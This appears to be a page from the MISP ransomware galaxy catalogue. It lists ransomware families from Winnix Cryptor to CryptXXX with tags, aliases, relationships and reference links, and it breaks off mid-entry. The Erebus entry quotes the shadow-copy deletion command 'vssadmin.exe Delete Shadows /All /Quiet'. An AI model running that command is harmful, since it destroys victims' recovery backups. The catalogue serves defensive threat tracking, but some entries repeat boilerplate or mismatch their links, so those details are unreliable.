The tag is: misp-galaxy:ransomware="Winnix Cryptor Ransomware"

Table 8134. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html

https://twitter.com/PolarToffee/status/811940037638111232

AngryDuck Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Demands 10 BTC

The tag is: misp-galaxy:ransomware="AngryDuck Ransomware"

Table 8135. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html

https://twitter.com/demonslay335/status/790334746488365057

Lock93 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Lock93 Ransomware"

Table 8136. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/lock93-ransomware.html

https://twitter.com/malwrhunterteam/status/789882488365678592

ASN1 Encoder Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ASN1 Encoder Ransomware"

Table 8137. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html

https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/

Click Me Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker tries to get the user to play a game and when the user clicks the button, there is no game, just 20 pictures in a .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif

The tag is: misp-galaxy:ransomware="Click Me Ransomware"

Table 8138. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html

https://www.youtube.com/watch?v=Xe30kV4ip8w

AiraCrop Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="AiraCrop Ransomware"

Table 8139. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

JapanLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Base64 encoding, ROT13, and top-bottom swapping

The tag is: misp-galaxy:ransomware="JapanLocker Ransomware"

JapanLocker Ransomware is also known as:

  • SHC Ransomware

  • SHCLocker

  • SyNcryption

Table 8140. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker

https://github.com/fortiguard-lion/schRansomwareDecryptor/blob/master/schRansomwarev1_decryptor.php

https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots

Anubis Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. EDA2

The tag is: misp-galaxy:ransomware="Anubis Ransomware"

Table 8141. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html

http://nyxbone.com/malware/Anubis.html

XTPLocker 5.0 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="XTPLocker 5.0 Ransomware"

Table 8142. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/xtplocker-ransomware.html

Exotic Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Also encrypts executables

The tag is: misp-galaxy:ransomware="Exotic Ransomware"

Table 8143. Table References

Links

https://www.bleepingcomputer.com/news/security/eviltwins-exotic-ransomware-targets-executable-files/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/exotic-ransomware

https://id-ransomware.blogspot.co.il/2016/10/exotic-ransomware.html

APT Ransomware v.2

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. NO POINT TO PAY THE RANSOM, THE FILES ARE COMPLETELY DESTROYED

The tag is: misp-galaxy:ransomware="APT Ransomware v.2"

Table 8144. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/apt-ransomware-2.html

Windows_Security Ransonware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Windows_Security Ransonware"

Windows_Security Ransonware is also known as:

  • WS Go Ransonware

  • Trojan.Encoder.6491

Windows_Security Ransonware has relationships with:

  • similar: misp-galaxy:ransomware="Encoder.xxxx" with estimative-language:likelihood-probability="likely"

Table 8145. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2

NCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="NCrypt Ransomware"

Table 8146. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html

Venis Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. In devVenisRansom@protonmail.com

The tag is: misp-galaxy:ransomware="Venis Ransomware"

Table 8147. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/venis-ransomware.html

https://twitter.com/Antelox/status/785849412635521024

http://pastebin.com/HuK99Xmj

Enigma 2 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Enigma 2 Ransomware"

Table 8148. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/enigma-2-ransomware.html

Deadly Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. sample is set to encrypt only in 2017…​

The tag is: misp-galaxy:ransomware="Deadly Ransomware"

Deadly Ransomware is also known as:

  • Deadly for a Good Purpose Ransomware

Table 8149. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/deadly-ransomware.html

https://twitter.com/malwrhunterteam/status/785533373007728640

Comrade Circle Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Comrade Circle Ransomware"

Table 8150. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html

Globe2 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Globe2 Ransomware"

Globe2 Ransomware is also known as:

  • Purge Ransomware

Globe2 Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Globe3 Ransomware" with estimative-language:likelihood-probability="likely"

Table 8151. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html

https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221

Kostya Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kostya Ransomware"

Table 8152. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html

http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

Fs0ciety Locker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Fs0ciety Locker Ransomware"

Table 8153. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.html

Erebus Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. After the files are decrypted, the shadow files are deleted using the following command: vssadmin.exe Delete Shadows /All /Quiet

The tag is: misp-galaxy:ransomware="Erebus Ransomware"

Table 8154. Table References

Links

https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html

WannaCry

According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of .1781 bitcoins, roughly $300 U.S.

The tag is: misp-galaxy:ransomware="WannaCry"

WannaCry is also known as:

  • WannaCrypt

  • WannaCry

  • WanaCrypt0r

  • WCrypt

  • WCRY

WannaCry has relationships with:

  • similar: misp-galaxy:malpedia="WannaCryptor" with estimative-language:likelihood-probability="likely"

Table 8155. Table References

Links

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

.CryptoHasYou.

Ransomware

The tag is: misp-galaxy:ransomware=".CryptoHasYou."

Table 8156. Table References

Links

http://www.nyxbone.com/malware/CryptoHasYou.html

777

Ransomware

The tag is: misp-galaxy:ransomware="777"

777 is also known as:

  • Sevleg

Table 8157. Table References

Links

https://decrypter.emsisoft.com/777

7ev3n

Ransomware

The tag is: misp-galaxy:ransomware="7ev3n"

7ev3n is also known as:

  • 7ev3n-HONE$T

7ev3n has relationships with:

  • similar: misp-galaxy:malpedia="7ev3n" with estimative-language:likelihood-probability="likely"

Table 8158. Table References

Links

https://github.com/hasherezade/malware_analysis/tree/master/7ev3n

https://www.youtube.com/watch?v=RDNbH5HDO1E&feature=youtu.be

http://www.nyxbone.com/malware/7ev3n-HONE$T.html

8lock8

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="8lock8"

Table 8159. Table References

Links

http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/

AiraCrop

Ransomware related to TeamXRat

The tag is: misp-galaxy:ransomware="AiraCrop"

Table 8160. Table References

Links

https://twitter.com/PolarToffee/status/796079699478900736

Al-Namrood

Ransomware

The tag is: misp-galaxy:ransomware="Al-Namrood"

Table 8161. Table References

Links

https://decrypter.emsisoft.com/al-namrood

Alpha Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alpha Ransomware"

Alpha Ransomware is also known as:

  • AlphaLocker

Alpha Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="AlphaLocker" with estimative-language:likelihood-probability="likely"

Table 8164. Table References

Links

http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip

https://www.bleepingcomputer.com/news/security/decrypted-alpha-ransomware-accepts-itunes-gift-cards-as-payment/

https://twitter.com/malwarebread/status/804714048499621888

AMBA

Ransomware Websites only amba@riseup.net

The tag is: misp-galaxy:ransomware="AMBA"

Table 8165. Table References

Links

https://twitter.com/benkow_/status/747813034006020096

https://www.enigmasoftware.com/ambaransomware-removal/

AngleWare

Ransomware

The tag is: misp-galaxy:ransomware="AngleWare"

Table 8166. Table References

Links

https://twitter.com/BleepinComputer/status/844531418474708993

Anony

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Anony"

Anony is also known as:

  • ngocanh

Table 8167. Table References

Links

https://twitter.com/struppigel/status/842047409446387714

Apocalypse

The tag is: misp-galaxy:ransomware="Apocalypse"

Apocalypse is also known as:

  • Fabiansomeware

Apocalypse has relationships with:

  • similar: misp-galaxy:rat="Apocalypse" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 8168. Table References

Links

https://decrypter.emsisoft.com/apocalypse

http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/

ApocalypseVM

Ransomware Apocalypse ransomware version which uses VMprotect

The tag is: misp-galaxy:ransomware="ApocalypseVM"

Table 8169. Table References

Links

http://decrypter.emsisoft.com/download/apocalypsevm

AutoLocky

Ransomware

The tag is: misp-galaxy:ransomware="AutoLocky"

Table 8170. Table References

Links

https://decrypter.emsisoft.com/autolocky

Aw3s0m3Sc0t7

Ransomware

The tag is: misp-galaxy:ransomware="Aw3s0m3Sc0t7"

Table 8171. Table References

Links

https://twitter.com/struppigel/status/828902907668000770

BaksoCrypt

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="BaksoCrypt"

Table 8173. Table References

Links

https://twitter.com/JakubKroustek/status/760482299007922176

https://0xc1r3ng.wordpress.com/2016/06/24/bakso-crypt-simple-ransomware/

Bandarchor

Ransomware Files might be partially encrypted

The tag is: misp-galaxy:ransomware="Bandarchor"

Bandarchor is also known as:

  • Rakhni

Bandarchor has relationships with:

  • similar: misp-galaxy:ransomware="Rakhni" with estimative-language:likelihood-probability="likely"

Table 8174. Table References

Links

https://reaqta.com/2016/03/bandarchor-ransomware-still-active/

https://www.bleepingcomputer.com/news/security/new-bandarchor-ransomware-variant-spreads-via-malvertising-on-adult-sites/

Bart

Ransomware Possible affiliations with RockLoader, Locky and Dridex

The tag is: misp-galaxy:ransomware="Bart"

Bart is also known as:

  • BaCrypt

Bart has relationships with:

  • similar: misp-galaxy:malpedia="Bart" with estimative-language:likelihood-probability="likely"

Table 8175. Table References

Links

http://now.avg.com/barts-shenanigans-are-no-match-for-avg/

http://phishme.com/rockloader-downloading-new-ransomware-bart/

https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky

BitCryptor

Ransomware Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.

The tag is: misp-galaxy:ransomware="BitCryptor"

Table 8176. Table References

Links

https://noransom.kaspersky.com/

https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

BlackShades Crypter

Ransomware

The tag is: misp-galaxy:ransomware="BlackShades Crypter"

BlackShades Crypter is also known as:

  • SilentShade

  • BlackShades

Table 8178. Table References

Links

http://nyxbone.com/malware/BlackShades.html

https://id-ransomware.blogspot.com/2016/06/silentshade-ransomware-blackshades.html

Blocatto

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Blocatto"

Table 8179. Table References

Links

http://www.bleepingcomputer.com/forums/t/614456/bloccato-ransomware-bloccato-help-support-leggi-questo-filetxt/

Booyah

Ransomware EXE was replaced to neutralize threat

The tag is: misp-galaxy:ransomware="Booyah"

Booyah is also known as:

  • Salami

Booyah has relationships with:

  • similar: misp-galaxy:ransomware="MM Locker" with estimative-language:likelihood-probability="likely"

Brazilian

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Brazilian"

Table 8180. Table References

Links

http://www.nyxbone.com/malware/brazilianRansom.html

http://www.nyxbone.com/images/articulos/malware/brazilianRansom/0.png

Brazilian Globe

Ransomware

The tag is: misp-galaxy:ransomware="Brazilian Globe"

Table 8181. Table References

Links

https://twitter.com/JakubKroustek/status/821831437884211201

BrLock

Ransomware

The tag is: misp-galaxy:ransomware="BrLock"

Table 8182. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered

Browlock

Ransomware no local encryption, browser only

The tag is: misp-galaxy:ransomware="Browlock"

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare Related to / new version of CryptXXX"

Table 8183. Table References

Links

https://twitter.com/malwrhunterteam/status/845199679340011520

Bucbi

Ransomware no file name change, no extension

The tag is: misp-galaxy:ransomware="Bucbi"

Table 8184. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-bucbi-ransomware-is-back-with-a-ukrainian-makeover/

https://id-ransomware.blogspot.com/2016/05/bucbi-ransomware.html

BuyUnlockCode

Ransomware Does not delete Shadow Copies

The tag is: misp-galaxy:ransomware="BuyUnlockCode"

Table 8185. Table References

Links

https://id-ransomware.blogspot.com/2016/05/buyunlockcode-ransomware-rsa-1024.html

Central Security Treatment Organization

Ransomware

The tag is: misp-galaxy:ransomware="Central Security Treatment Organization"

Central Security Treatment Organization has relationships with:

  • similar: misp-galaxy:ransomware="CryLocker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 8186. Table References

Links

http://www.bleepingcomputer.com/forums/t/625820/central-security-treatment-organization-ransomware-help-topic-cry-extension/

https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Cerber"

Cerber is also known as:

  • CRBR ENCRYPTOR

Cerber has relationships with:

  • similar: misp-galaxy:malpedia="Cerber" with estimative-language:likelihood-probability="likely"

Table 8187. Table References

Links

https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/

https://community.rsa.com/community/products/netwitness/blog/2016/11/04/the-evolution-of-cerber-v410

https://www.bleepingcomputer.com/news/security/cerber-renames-itself-as-crbr-encryptor-to-be-a-pita/

Clock

Ransomware Does not encrypt anything

The tag is: misp-galaxy:ransomware="Clock"

Table 8189. Table References

Links

https://twitter.com/JakubKroustek/status/794956809866018816

CoinVault

Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!

The tag is: misp-galaxy:ransomware="CoinVault"

Table 8190. Table References

Links

https://noransom.kaspersky.com/

https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

Cryaki

Ransomware

The tag is: misp-galaxy:ransomware="Cryaki"

Table 8192. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Crybola

Ransomware

The tag is: misp-galaxy:ransomware="Crybola"

Table 8193. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

CryFile

Ransomware

The tag is: misp-galaxy:ransomware="CryFile"

Table 8194. Table References

Links

SHTODELATVAM.txt[SHTODELATVAM.txt]

Instructionaga.txt[Instructionaga.txt]

https://id-ransomware.blogspot.com/2016/06/cryfile-ransomware-100.html

CryLocker

Ransomware Identifies victim locations w/Google Maps API

The tag is: misp-galaxy:ransomware="CryLocker"

CryLocker is also known as:

  • Cry

  • CSTO

  • Central Security Treatment Organization

CryLocker has relationships with:

  • similar: misp-galaxy:ransomware="Central Security Treatment Organization" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 8195. Table References

Links

http://www.bleepingcomputer.com/news/security/the-crylocker-ransomware-communicates-using-udp-and-stores-data-on-imgur-com/

https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

Crypter

Ransomware Does not actually encrypt the files, but simply renames them

The tag is: misp-galaxy:ransomware="Crypter"

Table 8199. Table References

Links

https://twitter.com/jiriatvirlab/status/802554159564062722

CryptInfinite

Ransomware

The tag is: misp-galaxy:ransomware="CryptInfinite"

CryptInfinite is also known as:

  • DecryptorMax

Table 8201. Table References

Links

https://decrypter.emsisoft.com/

https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html

CryptoBit

Ransomware sekretzbel0ngt0us.KEY - do not confuse with CryptorBit.

The tag is: misp-galaxy:ransomware="CryptoBit"

CryptoBit has relationships with:

  • similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Table 8202. Table References

Links

http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/

http://news.softpedia.com/news/new-cryptobit-ransomware-could-be-decryptable-503239.shtml

https://id-ransomware.blogspot.com/2016/04/cryptobit-ransomware.html

CryptoDefense

Ransomware no extension change

The tag is: misp-galaxy:ransomware="CryptoDefense"

Table 8203. Table References

Links

https://decrypter.emsisoft.com/

https://id-ransomware.blogspot.com/2016/04/cryptodefense-ransomware.html

CryptoFinancial

Ransomware

The tag is: misp-galaxy:ransomware="CryptoFinancial"

CryptoFinancial is also known as:

  • Ranscam

CryptoFinancial has relationships with:

  • similar: misp-galaxy:malpedia="Ranscam" with estimative-language:likelihood-probability="likely"

Table 8204. Table References

Links

http://blog.talosintel.com/2016/07/ranscam.html

https://nakedsecurity.sophos.com/2016/07/13/ransomware-that-demands-money-and-gives-you-back-nothing/

https://id-ransomware.blogspot.com/search?q=CryptoFinancial

CryptoFortress

Ransomware Mimics Torrentlocker. Encrypts only 50% of each file up to 5 MB

The tag is: misp-galaxy:ransomware="CryptoFortress"

CryptoFortress has relationships with:

  • similar: misp-galaxy:ransomware="TorrentLocker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 8205. Table References

Links

https://id-ransomware.blogspot.com/2016/05/cryptofortress-ransomware-aes-256-1.html

CryptoGraphic Locker

Ransomware Has a GUI. Subvariants: CoinVault BitCryptor

The tag is: misp-galaxy:ransomware="CryptoGraphic Locker"

CryptoHost

Ransomware RAR’s victim’s files has a GUI

The tag is: misp-galaxy:ransomware="CryptoHost"

CryptoHost is also known as:

  • Manamecrypt

  • Telograph

  • ROI Locker

CryptoHost has relationships with:

  • similar: misp-galaxy:malpedia="ManameCrypt" with estimative-language:likelihood-probability="likely"

Table 8206. Table References

Links

http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/

https://id-ransomware.blogspot.com/2016/04/cryptohost-ransomware.html

CryptoJoker

Ransomware

The tag is: misp-galaxy:ransomware="CryptoJoker"

CryptoJoker has relationships with:

  • similar: misp-galaxy:ransomware="CryptoNar" with estimative-language:likelihood-probability="likely"

Table 8207. Table References

Links

https://id-ransomware.blogspot.com/2017/07/cryptojoker-2017-ransomware.html

CryptoLocker

Ransomware no longer relevant

The tag is: misp-galaxy:ransomware="CryptoLocker"

CryptoLocker has relationships with:

  • similar: misp-galaxy:malpedia="CryptoLocker" with estimative-language:likelihood-probability="likely"

Table 8208. Table References

Links

https://www.fireeye.com/blog/executive-perspective/2014/08/your-locker-of-information-for-cryptolocker-decryption.html

https://reaqta.com/2016/04/uncovering-ransomware-distribution-operation-part-2/

CryptoLocker 1.0.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 1.0.0"

Table 8209. Table References

Links

https://twitter.com/malwrhunterteam/status/839747940122001408

CryptoLocker 5.1

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 5.1"

Table 8210. Table References

Links

https://twitter.com/malwrhunterteam/status/782890104947867649

CryptoMix

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix"

CryptoMix is also known as:

  • Zeta

CryptoMix has relationships with:

  • similar: misp-galaxy:malpedia="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Table 8211. Table References

Links

http://www.nyxbone.com/malware/CryptoMix.html

https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/

https://twitter.com/JakubKroustek/status/804009831518572544

https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/0000-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/xzzx-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/test-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/mole66-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/new-backup-cryptomix-ransomware-variant-actively-infecting-users/

https://twitter.com/demonslay335/status/1072227523755470848

https://www.coveware.com/blog/cryptomix-ransomware-exploits-cancer-crowdfunding

https://www.bleepingcomputer.com/news/security/cryptomix-ransomware-exploits-sick-children-to-coerce-payments/

CryptoRansomeware

Ransomware

The tag is: misp-galaxy:ransomware="CryptoRansomeware"

CryptoRansomeware has relationships with:

  • similar: misp-galaxy:malpedia="CryptoRansomeware" with estimative-language:likelihood-probability="likely"

Table 8212. Table References

Links

https://twitter.com/malwrhunterteam/status/817672617658347521

CryptoShadow

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShadow"

Table 8214. Table References

Links

https://twitter.com/struppigel/status/821992610164277248

CryptoTrooper

Ransomware

The tag is: misp-galaxy:ransomware="CryptoTrooper"

Table 8217. Table References

Links

http://news.softpedia.com/news/new-open-source-linux-ransomware-shows-infosec-community-divide-508669.shtml

CryptoWall 1

Ransomware, Infection by Phishing

The tag is: misp-galaxy:ransomware="CryptoWall 1"

CryptoWall 2

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 2"

CryptoWall 4

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 4"

CryptXXX

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX"

CryptXXX is also known as:

  • CryptProjectXXX

CryptXXX has relationships with:

  • similar: misp-galaxy:ransomware="CryptXXX 2.0" with estimative-language:likelihood-probability="likely"

Table 8219. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

http://www.bleepingcomputer.com/virus-removal/cryptxxx-ransomware-help-information

https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryptXXX 2.0

